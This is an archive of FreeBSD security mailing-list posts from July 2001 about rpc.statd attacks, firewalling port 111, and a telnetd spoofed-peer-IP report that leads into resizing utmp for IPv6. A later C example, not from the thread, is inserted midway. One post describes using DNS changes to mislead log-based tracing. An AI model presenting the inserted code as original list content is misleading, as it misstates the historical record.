From owner-freebsd-security Sun Jul 22 03:50:52 2001
From: serkoon
Subject: Re: rpc.statd attacks
Date: Sun, 22 Jul 2001 12:52:08 +0200

> However, since I have port 111 blocked in the firewall,
> how in the world is even an error message being generated?
> I have even portscanned and 111 is not open to the outside.

Firewall UDP:111 or kill portmapd (if you don't need it).
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jul 22 09:09:40 2001
From: Keith Stevenson
To: Kris Kennaway
Cc: security@freebsd.org
Subject: Re: telnetd root exploit
Date: Sun, 22 Jul 2001 12:09:32 -0400

On Sat, Jul 21, 2001 at 02:53:55PM -0700, Kris Kennaway wrote:
> On Sat, Jul 21, 2001 at 02:50:05PM -0700, Holtor wrote:
> > Any idea when the official advisory will be sent?
> > I don't want to think I'm patched and restart telnetd
> > only to be rooted by some lame script kiddie. Thanks
> > much.
>
> Probably Monday.

I have a small suggestion for this and future advisories. Could you
include which file versions are "fixed"?
For example, in addition to stating that the problem was resolved on a
certain date, also include that the fix is in foo.c version (mumble).
It would help make certain that I am indeed patched. (Yes, I do read
the commit messages, but I've been known to miss these things.)

Regards,
--Keith Stevenson--

--
Keith Stevenson
System Programmer - Data Center Services - University of Louisville
keith.stevenson@louisville.edu
GPG key fingerprint = 332D 97F0 6321 F00F 8EE7 2D44 00D8 F384 75BB 89AE

From owner-freebsd-security Sun Jul 22 11:08:03 2001
From: Crist J. Clark
To: serkoon
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rpc.statd attacks
Date: Sun, 22 Jul 2001 11:07:55 -0700

On Sun, Jul 22, 2001 at 12:52:08PM +0200, serkoon wrote:
> > However, since I have port 111 blocked in the firewall,
> > how in the world is even an error message being generated?
> > I have even portscanned and 111 is not open to the outside.
>
> Firewall UDP:111 or kill portmapd (if you don't need it).

1) You do not allow traffic to 111/tcp OR 111/udp, do you?

2) Just because you block port 111 doesn't mean people cannot attack
rpc.statd. Blocking 111 just makes finding the ports that rpc.statd is
listening on a little harder, but not difficult.

Don't "block" port 111. Pass only traffic you want and expect, block
everything else by default.
--
Crist J. Clark
cjclark@alum.mit.edu

From owner-freebsd-security Sun Jul 22 13:35:37 2001
From: Hajimu UMEMOTO
To: brian@Awfulhak.org
Cc: ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 05:30:51 +0900 (JST)

>>>>> On Sat, 21 Jul 2001 23:34:30 +0100
>>>>> Brian Somers said:

brian> Yes, there is a problem where we've basically trusted a DNS that we
brian> don't own -- and that is a risk.  But I can't see why 9.8.7.6 is
brian> relevant, *except* that ``w -n'' may be mentioning it.

brian> Am I misinterpreting things or is the real problem that a forward and
brian> reverse DNS can both conspire against you ?  Or is the real problem
brian> just ``w''s -n flag ?

It is a problem of w(1). `w -n' does a forward lookup for IPv4 only, and
IPv6 is not supported at all. When available, login(1) writes the
hostname into utmp instead of the IP address. If a hostname is saved, `w
-n' queries the A RR for the hostname.
The real problem is that UT_HOSTSIZE is too short to hold an IPv6 address.
Is there any chance to expand UT_HOSTSIZE in time for 5.0-RELEASE? It
apparently breaks binary compatibility.
--
Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan
ume@mahoroba.org  ume@bisd.hitachi.co.jp  ume@{,jp.}FreeBSD.org
http://www.imasy.org/~ume/

From owner-freebsd-security Sun Jul 22 13:38:23 2001
From: Richard A. Steenbergen
To: Hajimu UMEMOTO
Cc: brian@Awfulhak.org, roam@orbitel.bg, freebsd-security@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Sun, 22 Jul 2001 16:38:13 -0400 (EDT)

On Mon, 23 Jul 2001, Hajimu UMEMOTO wrote:

> >>>>> On Sat, 21 Jul 2001 23:34:30 +0100
> >>>>> Brian Somers said:
>
> brian> Yes, there is a problem where we've basically trusted a DNS that we
> brian> don't own -- and that is a risk.  But I can't see why 9.8.7.6 is
> brian> relevant, *except* that ``w -n'' may be mentioning it.
>
> brian> Am I misinterpreting things or is the real problem that a forward and
> brian> reverse DNS can both conspire against you ?  Or is the real problem
> brian> just ``w''s -n flag ?
>
> It is a problem of w(1). `w -n' does a forward lookup for IPv4 only, and
> IPv6 is not supported at all. When available, login(1) writes the
> hostname into utmp instead of the IP address. If a hostname is saved, `w
> -n' queries the A RR for the hostname.
> The real problem is that UT_HOSTSIZE is too short to hold an IPv6 address.
> Is there any chance to expand UT_HOSTSIZE in time for 5.0-RELEASE? It
> apparently breaks binary compatibility.

This is not the problem here, login is writing the false IP to utmp.
--
Richard A Steenbergen       http://www.e-gerbil.net/ras
PGP Key ID: 0x138EA177  (67 29 D7 BC E8 18 3E DA  B2 46 B3 D8 14 36 FE B6)

From owner-freebsd-security Sun Jul 22 14:04:44 2001
From: serkoon
Subject: Re: rpc.statd attacks
Date: Sun, 22 Jul 2001 23:06:07 +0200

Chris wrote:
> Don't "block" port 111. Pass only traffic you want and expect, block
> everything else by default.

Yes, I should have made that more clear, but since I don't have it set up
that way, at least for UDP, it didn't occur to me. One should use stateful
filtering for this to work right. (Don't ever allow udp from any:53 to
$yourip).
With regards

From owner-freebsd-security Sun Jul 22 14:10:02 2001
From: Hajimu UMEMOTO
To: ras@e-gerbil.net
Cc: brian@Awfulhak.org, roam@orbitel.bg, freebsd-security@FreeBSD.org, freebsd-gnats-submit@FreeBSD.org
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 06:09:35 +0900 (JST)

>>>>> On Sun, 22 Jul 2001 16:38:13 -0400 (EDT)
>>>>> "Richard A. Steenbergen" said:

ras> On Mon, 23 Jul 2001, Hajimu UMEMOTO wrote:

> >>>>> On Sat, 21 Jul 2001 23:34:30 +0100
> >>>>> Brian Somers said:
>
> brian> Yes, there is a problem where we've basically trusted a DNS that we
> brian> don't own -- and that is a risk.  But I can't see why 9.8.7.6 is
> brian> relevant, *except* that ``w -n'' may be mentioning it.
>
> brian> Am I misinterpreting things or is the real problem that a forward and
> brian> reverse DNS can both conspire against you ?  Or is the real problem
> brian> just ``w''s -n flag ?
>
> It is a problem of w(1). `w -n' does a forward lookup for IPv4 only, and
> IPv6 is not supported at all. When available, login(1) writes the
> hostname into utmp instead of the IP address. If a hostname is saved, `w
> -n' queries the A RR for the hostname.
> The real problem is that UT_HOSTSIZE is too short to hold an IPv6 address.
> Is there any chance to expand UT_HOSTSIZE in time for 5.0-RELEASE? It
> apparently breaks binary compatibility.

ras> This is not the problem here, login is writing the false IP to utmp.

I cannot agree with you here. You did ssh via IPv6. login(1) cannot
write an IPv6 address into utmp. In this case, realhostname_sa(3) returns
the hostname. The cases in which the IP address is saved are:

- the reverse or forward lookup failed,
- the result of the reverse -> forward lookup doesn't match the address, or
- IPv4.

Even if an IPv6 address is saved, since it is chopped, it will fail the
reverse lookup.
From owner-freebsd-security Sun Jul 22 14:18:18 2001
From: Matt Dillon
To: Hajimu UMEMOTO
Cc: brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Sun, 22 Jul 2001 14:17:58 -0700 (PDT)

:It is a problem of w(1). `w -n' does a forward lookup for IPv4 only, and
:IPv6 is not supported at all. When available, login(1) writes the
:hostname into utmp instead of the IP address. If a hostname is saved, `w
:-n' queries the A RR for the hostname.
:The real problem is that UT_HOSTSIZE is too short to hold an IPv6 address.
:Is there any chance to expand UT_HOSTSIZE in time for 5.0-RELEASE? It
:apparently breaks binary compatibility.

    I think if we are going to increase UT_HOSTSIZE, then 5.0 (i.e. now)
    is exactly the right time to do it.  How large does UT_HOSTSIZE
    have to be to accommodate an IPV6 address?

                                        -Matt

From owner-freebsd-security Sun Jul 22 14:21:14 2001
From: Anthony Schneider
To: Matt Dillon
Cc: Hajimu UMEMOTO, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Sun, 22 Jul 2001 17:22:32 -0400

16 bytes.

On Sun, Jul 22, 2001 at 02:17:58PM -0700, Matt Dillon wrote:
>
> :It is a problem of w(1). `w -n' does a forward lookup for IPv4 only, and
> :IPv6 is not supported at all. When available, login(1) writes the
> :hostname into utmp instead of the IP address. If a hostname is saved, `w
> :-n' queries the A RR for the hostname.
> :The real problem is that UT_HOSTSIZE is too short to hold an IPv6 address.
> :Is there any chance to expand UT_HOSTSIZE in time for 5.0-RELEASE? It
> :apparently breaks binary compatibility.
>
>     I think if we are going to increase UT_HOSTSIZE, then 5.0 (i.e. now)
>     is exactly the right time to do it.  How large does UT_HOSTSIZE
>     have to be to accommodate an IPV6 address?
>
>                                         -Matt

From owner-freebsd-security Sun Jul 22 14:30:05 2001
From: Peter Pentchev
To: Anthony Schneider
Cc: Matt Dillon, Hajimu UMEMOTO, brian@Awfulhak.org, ras@e-gerbil.net, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 00:29:12 +0300

Not really; I'd think that utmp structures hold an ASCII string, not the
binary address representation. Thus, the current UT_HOSTSIZE of 16 is
quite enough to hold an IPv4 address (4*3 + 3 dots), but not nearly
enough for full-blown IPv6 addresses.

G'luck,
Peter

--
If this sentence didn't exist, somebody would have invented it.

On Sun, Jul 22, 2001 at 05:22:32PM -0400, Anthony Schneider wrote:
> 16 bytes.
>
> On Sun, Jul 22, 2001 at 02:17:58PM -0700, Matt Dillon wrote:
> >
> > :It is a problem of w(1). `w -n' does a forward lookup for IPv4 only, and
> > :IPv6 is not supported at all. When available, login(1) writes the
> > :hostname into utmp instead of the IP address. If a hostname is saved, `w
> > :-n' queries the A RR for the hostname.
> > :The real problem is that UT_HOSTSIZE is too short to hold an IPv6 address.
> > :Is there any chance to expand UT_HOSTSIZE in time for 5.0-RELEASE? It
> > :apparently breaks binary compatibility.
> >
> >     I think if we are going to increase UT_HOSTSIZE, then 5.0 (i.e. now)
> >     is exactly the right time to do it.  How large does UT_HOSTSIZE
> >     have to be to accommodate an IPV6 address?
> >
> >                                         -Matt

From owner-freebsd-security Sun Jul 22 14:35:36 2001
From: Hajimu UMEMOTO
To: aschneid@mail.slc.edu
Cc: dillon@earth.backplane.com, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 06:34:58 +0900 (JST)

>>>>> On Sun, 22 Jul 2001 17:22:32 -0400
>>>>> Anthony Schneider said:

aschneid> 16 bytes.

It's a binary form. We need 40 bytes for a global address. To save a
site-local or link-local address, we need more space for the scope
identifier. I believe the length of the scope identifier is not defined
and is system specific.

global address:

  1234567890123456789012345678901234567890
  NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN\n

scoped address:

  1234567890123456789012345678901234567890
  NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n

There is one more consideration. `:' conflicts with X. I have no
particular idea to solve this problem. Enclosing the IPv6 address with
`[' and `]' doesn't help without changing the X side.

From owner-freebsd-security Sun Jul 22 15:58:17 2001
From: Matt Dillon
To: Hajimu UMEMOTO
Cc: aschneid@mail.slc.edu, dillon@earth.backplane.com, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Sun, 22 Jul 2001 15:57:56 -0700 (PDT)

:>>>>> On Sun, 22 Jul 2001 17:22:32 -0400
:>>>>> Anthony Schneider said:
:
:aschneid> 16 bytes.
:
:It's a binary form. We need 40 bytes for a global address. To save a
:site-local or link-local address, we need more space for the scope
:identifier. I believe the length of the scope identifier is not defined
:and is system specific.
:
:global address:
:
:  1234567890123456789012345678901234567890
:  NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN\n
:
:scoped address:
:
:  1234567890123456789012345678901234567890
:  NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n
:
:There is one more consideration. `:' conflicts with X. I have no
:particular idea to solve this problem. Enclosing the IPv6 address with
:`[' and `]' doesn't help without changing the X side.

    Ok, it sounds like 56 bytes ought to be sufficient. This will
    increase the lastlog structure from 28 bytes to 68 bytes
    and the utmp/wtmp structure from 44 bytes to 84 bytes. A
    buildworld would be necessary to deal with the change and
    certain ports, such as ftpd, would have to be rebuilt
    (for those people using them) to avoid corruption. utmp
    is one of the few structures in the system which is
    written out 'manually' by various programs, which is why
    changing the size of the structure is so nasty.

    The issue with X is a separate problem.
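An added example, not code from the thread or from FreeBSD, that checks the record growth Matt quotes (28 to 68 for lastlog, 44 to 84 for utmp/wtmp) and shows the "chopped" case Hajimu describes. It reproduces the 4.x-era lastlog/utmp layouts as assumed here (UT_LINESIZE 8, UT_NAMESIZE 16, and a 32-bit time field standing in for the i386 time_t so the sizes come out the same on any host) and stores constructed IPv4 and IPv6 literals into host fields of 16, 40 and 56 bytes.

```c
/* Added example; the struct layouts, field sizes and sample addresses are
 * assumptions reconstructed from the thread, not FreeBSD's headers. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define UT_LINESIZE      8
#define UT_NAMESIZE      16
#define UT_HOSTSIZE_OLD  16   /* the value under discussion */
#define UT_HOSTSIZE_NEW  56   /* Matt Dillon's proposed size */

/* int32_t stands in for the 32-bit time_t of the i386 platform of the time. */
struct lastlog_old { int32_t ll_time; char ll_line[UT_LINESIZE]; char ll_host[UT_HOSTSIZE_OLD]; };
struct lastlog_new { int32_t ll_time; char ll_line[UT_LINESIZE]; char ll_host[UT_HOSTSIZE_NEW]; };
struct utmp_old { char ut_line[UT_LINESIZE]; char ut_name[UT_NAMESIZE]; char ut_host[UT_HOSTSIZE_OLD]; int32_t ut_time; };
struct utmp_new { char ut_line[UT_LINESIZE]; char ut_name[UT_NAMESIZE]; char ut_host[UT_HOSTSIZE_NEW]; int32_t ut_time; };

/* Does a text literal fit in a host field of this size, terminator included? */
int host_fits(size_t hostsize, const char *literal)
{
    return strlen(literal) + 1 <= hostsize;
}

/* Simulate login(1) filling ut_host (NUL-padded, not guaranteed terminated),
 * then read the field back the bounded way a consumer such as w(1) must,
 * strip any %scope suffix (inet_pton does not accept one) and try to parse
 * what survived as an address of the given family. */
int stored_host_parses(size_t hostsize, const char *literal, int family)
{
    char field[UT_HOSTSIZE_NEW];
    char buf[UT_HOSTSIZE_NEW + 1];
    unsigned char addr[sizeof(struct in6_addr)];
    size_t n = 0;
    char *pct;

    if (hostsize > sizeof field)
        return 0;
    memset(field, 0, sizeof field);
    strncpy(field, literal, hostsize);          /* chops silently at hostsize */

    while (n < hostsize && field[n] != '\0')    /* bounded length: no terminator is guaranteed */
        n++;
    memcpy(buf, field, n);
    buf[n] = '\0';
    if ((pct = strchr(buf, '%')) != NULL)
        *pct = '\0';
    return inet_pton(family, buf, addr) == 1;
}

/* The record sizes quoted in the thread: 28 -> 68 for lastlog, 44 -> 84 for utmp/wtmp. */
int sizes_match_thread(void)
{
    return sizeof(struct lastlog_old) == 28 && sizeof(struct lastlog_new) == 68
        && sizeof(struct utmp_old) == 44 && sizeof(struct utmp_new) == 84;
}

/* Constructed sample literals (documentation and link-local prefixes, not real hosts). */
static const char *v4_literal     = "192.168.2.1";
static const char *v6_global      = "2001:0db8:1234:5678:9abc:def0:1234:5678";      /* 39 chars */
static const char *v6_link_scoped = "fe80:0000:0000:0000:0211:22ff:fe33:4455%fxp0"; /* 44 chars */

int main(void)
{
    printf("lastlog %zu -> %zu, utmp %zu -> %zu (matches thread: %s)\n",
           sizeof(struct lastlog_old), sizeof(struct lastlog_new),
           sizeof(struct utmp_old), sizeof(struct utmp_new),
           sizes_match_thread() ? "yes" : "no");
    printf("IPv4 in 16:        fits=%d parses=%d\n", host_fits(16, v4_literal),
           stored_host_parses(16, v4_literal, AF_INET));
    printf("IPv6 global in 16: fits=%d parses=%d\n", host_fits(16, v6_global),
           stored_host_parses(16, v6_global, AF_INET6));
    printf("IPv6 global in 56: fits=%d parses=%d\n", host_fits(56, v6_global),
           stored_host_parses(56, v6_global, AF_INET6));
    /* 40 bytes hold a global address but not the %fxp0 scope: the chopped
     * field still parses, so parsing alone does not reveal what was lost. */
    printf("IPv6 scoped in 40: fits=%d parses=%d\n", host_fits(40, v6_link_scoped),
           stored_host_parses(40, v6_link_scoped, AF_INET6));
    printf("IPv6 scoped in 56: fits=%d parses=%d\n", host_fits(56, v6_link_scoped),
           stored_host_parses(56, v6_link_scoped, AF_INET6));
    return 0;
}
```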
From owner-freebsd-security Sun Jul 22 17:02:48 2001
From: Jeroen Massar
To: Matt Dillon, Hajimu UMEMOTO
Subject: RE: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 01:58:33 +0200

Matt Dillon wrote:
> :  1234567890123456789012345678901234567890
> :  NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n
> :
> :There is one more consideration. `:' conflicts with X. I have no
> :particular idea to solve this problem. Enclosing the IPv6 address with
> :`[' and `]' doesn't help without changing the X side.
> :
>     Ok, it sounds like 56 bytes ought to be sufficient. This will
>     increase the lastlog structure from 28 bytes to 68 bytes
>     and the utmp/wtmp structure from 44 bytes to 84 bytes. A
>     buildworld would be necessary to deal with the change and
>     certain ports, such as ftpd, would have to be rebuilt
>     (for those people using them) to avoid corruption. utmp
>     is one of the few structures in the system which is
>     written out 'manually' by various programs, which is why
>     changing the size of the structure is so nasty.
>
>     The issue with X is a separate problem.

And what if we get IP18 in a couple of years? Resize again???

Better to change it to:

char Hostname[size];
char Address[size];
int AddressType; // AF_INET6, AF_INET, AF_* whatever... these are standardized (kinda :)

And of course... For 'filling' these infos there should be standard
functions, for reading it too (in different formats of course ;)...
Which makes sure that you don't have to upgrade every util whenever the
format of that file changes again.... If at all it stays a file in the
future... Even then....

IMHO one should log both hostname _AND_ IP...

Following situation:
23 June 2001 - I log into a machine from 10.1.2.3 which maps to
bla.example.com which points to 10.1.2.3, thus bla.example.com is
logged...
24 June 2001 - The bla.example.com A is changed to 192.168.2.1,
192.168.2.1 gets pointed back to bla.example.com...

Now I actually did very evil things with that box on the 23rd.... So
the admin of the box wants to hunt me down and checks his/her/its logs:
Ooe..... that evil user came from 'bla.example.com', let's find out
his/her/its IP.... aha 192.168.2.1 <-------- OOOPS... Not even the same
provider I actually came from to do all those very evil things... So
long for your 'nice' logging facility... (and thanks for all the
fish... :)

I know... It's been there for a long time and over many many unices but
that doesn't say it's still acceptable...

Only storing the IP is useless too of course.. Because then you never
know what the old hostname (for which you actually accepted) was...
Especially if you got /etc/hosts.allow with the old reverse in it, but
not the new one etc...
Greets,
Jeroen

From owner-freebsd-security Sun Jul 22 17:07:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 0D0D237B406 for ; Sun, 22 Jul 2001 17:07:29 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us)
Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0F7m29933; Sun, 22 Jul 2001 20:15:08 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us)
Date: Sun, 22 Jul 2001 20:07:38 -0400 (EDT)
From: Jim Durham
X-X-Sender:
To: serkoon
Cc:
Subject: Re: rpc.statd attacks
In-Reply-To: <002e01c1129c$5b0ef6b0$0200000a@kilmarnock>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sun, 22 Jul 2001, serkoon wrote:

> > However, since I have port 111 blocked in the firewall,
> > how in the world is even an error message being generated?
> > I have even portscanned and 111 is not open to the outside.
>
> Firewall UDP:111 or kill portmapd (if you don't need it).
>

I'm using NFS internally, so I need portmapd and 111 udp is blocked. That's what is bothering me..
-Jim

From owner-freebsd-security Sun Jul 22 17:12:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.ipfw.org (cr308584-a.wlfdle1.on.wave.home.com [24.114.52.208]) by hub.freebsd.org (Postfix) with ESMTP id 692BF37B401 for ; Sun, 22 Jul 2001 17:12:25 -0700 (PDT) (envelope-from pccb@yahoo.com)
Received: from apollo (apollo.objtech.com [192.168.111.5]) by mail.ipfw.org (Postfix) with ESMTP id 2D8BF3115; Sun, 22 Jul 2001 20:12:24 -0400 (EDT)
Date: Sun, 22 Jul 2001 20:12:24 -0400
From: Peter Chiu
X-Mailer: The Bat! (v1.53bis)
Reply-To: Peter Chiu
X-Priority: 3 (Normal)
Message-ID: <11065209255.20010722201224@ipfw.org>
To: Jim Durham
Cc: serkoon , freebsd-security@FreeBSD.ORG
Subject: Re: rpc.statd attacks
In-Reply-To:
References:
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hello Jim,

SYNOPSIS
     portmap [-d] [-v] [-h bindip]

You can just bind it to your internal IP.

Sunday, July 22, 2001, 8:07:38 PM, you wrote:

JD> On Sun, 22 Jul 2001, serkoon wrote:

JD> I'm using NFS internally, so I need portmapd and 111 udp is
JD> blocked. That's what is bothering me..
--
Peter

From owner-freebsd-security Sun Jul 22 17:18:01 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id EF1C737B403 for ; Sun, 22 Jul 2001 17:17:57 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us)
Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0Plm29972; Sun, 22 Jul 2001 20:25:47 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us)
Date: Sun, 22 Jul 2001 20:18:12 -0400 (EDT)
From: Jim Durham
X-X-Sender:
To: serkoon
Cc:
Subject: Re: rpc.statd attacks
In-Reply-To: <002501c112f2$208d47c0$0200000a@kilmarnock>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sun, 22 Jul 2001, serkoon wrote:

> Chris wrote:
>
> > Don't "block" port 111. Pass only traffic you want and expect, block
> > everything else by default.
>
> Yes, I should have made that more clear, but since I don't have it setup
> that way, at least for UDP, it didn't occur to me. One should use
> stateful filtering for this to work right. (Don't ever allow udp from any:53
> to $yourip).
>
> With regards
>

I'm not allowing packets "in via outside_interface", either tcp or udp to port 111. Obviously, if I blocked 111 internally, my NFS would quit! I gather this is wrong. Would someone explain why?
-Jim

From owner-freebsd-security Sun Jul 22 17:18:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 9AD2137B406; Sun, 22 Jul 2001 17:18:15 -0700 (PDT) (envelope-from brian@Awfulhak.org)
Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6N0ICI00840; Mon, 23 Jul 2001 01:18:13 +0100 (BST) (envelope-from brian@lan.Awfulhak.org)
Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6MNtGg11536; Mon, 23 Jul 2001 00:55:16 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Message-Id: <200107222355.f6MNtGg11536@hak.lan.Awfulhak.org>
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
To: Matt Dillon
Cc: Hajimu UMEMOTO , aschneid@mail.slc.edu, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
In-Reply-To: Message from Matt Dillon of "Sun, 22 Jul 2001 15:57:56 PDT." <200107222257.f6MMvuE12313@earth.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 23 Jul 2001 00:55:16 +0100
From: Brian Somers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> :>>>>> On Sun, 22 Jul 2001 17:22:32 -0400
> :>>>>> Anthony Schneider said:
> :
> :aschneid> 16 bytes.
> :
> :It's a binary form. We need 40 bytes for global address. To save
> :site-local or link-local address, we need more space for scope
> :identifier. I believe the length of scope identifier is not defined
> :and system specific.
> :
> :global address:
> :
> : 1234567890123456789012345678901234567890
> : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN\n
> :
> :scoped address:
> :
> : 1234567890123456789012345678901234567890
> : NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN:NNNN%fxp0\n
> :
> :There is one more consideration. `:' conflicts with X. I have no
> :particular idea to solve this problem. Enclosing IPv6 address with
> :`[' and `]' doesn't help without changing X side.
> :
> :--
> :Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan
> :ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org
> :http://www.imasy.org/~ume/
>
> Ok, it sounds like 56 bytes ought to be sufficient. This will
> increase the lastlog structure from 28 bytes to 68 bytes
> and the utmp/wtmp structure from 44 bytes to 84 bytes. A
> buildworld would be necessary to deal with the change and
> certain ports, such as ftpd, would have to be rebuilt
> (for those people using them) to avoid corruption. utmp
> is one of the few structures in the system which is
> written out 'manually' by various programs, which is why
> changing the size of the structure is so nasty.

I think an API should really be introduced if we're going to do this - there's no point in doing only half the job :-/

I'm no great expert with IPv6, but if the scoping needs to be recorded here, who can guarantee that the length of the interface name will fit (remember, interface numbers can easily be something like 10000 -- think ifconfig gif10000 create, and that's not even considering the name itself having no limits as far as I'm aware). Besides, we also need an address family field.

It seems that part of the problem described in this PR is the fact that running ``login -p hostname blah'' results in login(1) doing a reverse lookup on hostname - assuming it's IPv4. w(1) does the same.

> The issue with X is a separate problem.
The X-style ``machine:screen'' thing doesn't conflict as an IPv6 address will always have at least two ``:''s in it and an X entry will only ever have one.

> -Matt

--
Brian
http://www.freebsd-services.com/
Don't _EVER_ lose your sense of humour !

From owner-freebsd-security Sun Jul 22 17:25:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 92F2337B405 for ; Sun, 22 Jul 2001 17:25:19 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us)
Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0XAm29999; Sun, 22 Jul 2001 20:33:11 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us)
Date: Sun, 22 Jul 2001 20:25:32 -0400 (EDT)
From: Jim Durham
X-X-Sender:
To: Peter Chiu
Cc: serkoon ,
Subject: Re: rpc.statd attacks
In-Reply-To: <11065209255.20010722201224@ipfw.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sun, 22 Jul 2001, Peter Chiu wrote:

> Hello Jim,
>
> SYNOPSIS
>      portmap [-d] [-v] [-h bindip]
>
> You can just bind it to your internal IP.
>
>
> Sunday, July 22, 2001, 8:07:38 PM, you wrote:
>
>
> JD> On Sun, 22 Jul 2001, serkoon wrote:
>
> JD> I'm using NFS internally, so I need portmapd and 111 udp is
> JD> blocked. That's what is bothering me..
>
> --

OK, I was unaware of *that*, but it did remind me of something else... I *do* have portmap in my hosts.allow for LAN addresses only (I'm running natd with private addresses on the LAN, and all NFS stuff flows on those addresses). I'll also do what you suggested.
-Jim

From owner-freebsd-security Sun Jul 22 17:25:34 2001
Delivered-To: freebsd-security@freebsd.org
